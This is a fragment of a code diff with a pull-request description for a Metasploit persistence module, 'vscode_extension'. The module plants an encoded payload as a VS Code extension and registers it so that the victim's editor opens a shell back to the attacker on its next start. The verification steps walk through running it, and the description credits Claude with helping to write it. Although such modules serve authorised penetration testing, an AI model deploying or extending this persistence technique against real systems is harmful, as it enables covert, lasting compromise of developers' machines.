+    write_file(index_path, JSON.generate(extensions))
+    print_good("Registered extension in #{index_path}")
+    index_path
+  end
+
   def install_persistence
     print_status("Using extension: #{ext_dir_name}")
 
@@ -180,6 +235,8 @@ class MetasploitModule < Msf::Exploit::Local
     ext_path = "#{ext_dir}#{sep}external"
     write_file(ext_path, [payload.encoded].pack('m0'))
     print_good("Wrote payload to #{ext_path}")
+
+    register_extension(ext_base, ext_dir)
 
     if vscode_running?
       print_warning('VS Code is currently running — restart VS Code to activate the extension.')


### PR DESCRIPTION
This PR adds a new persistence module by install a VS Code extension in user's instances. When they start VS Code, you get a shell back!

Claude assisted in the development of this module.

## Verification

1. Install the application
2. Start msfconsole
3. Get a shell
4. Do: `use exploit/multi/persistence/vscode_extension`
5. Do: `run`
6. You should get a shell when vscode opens next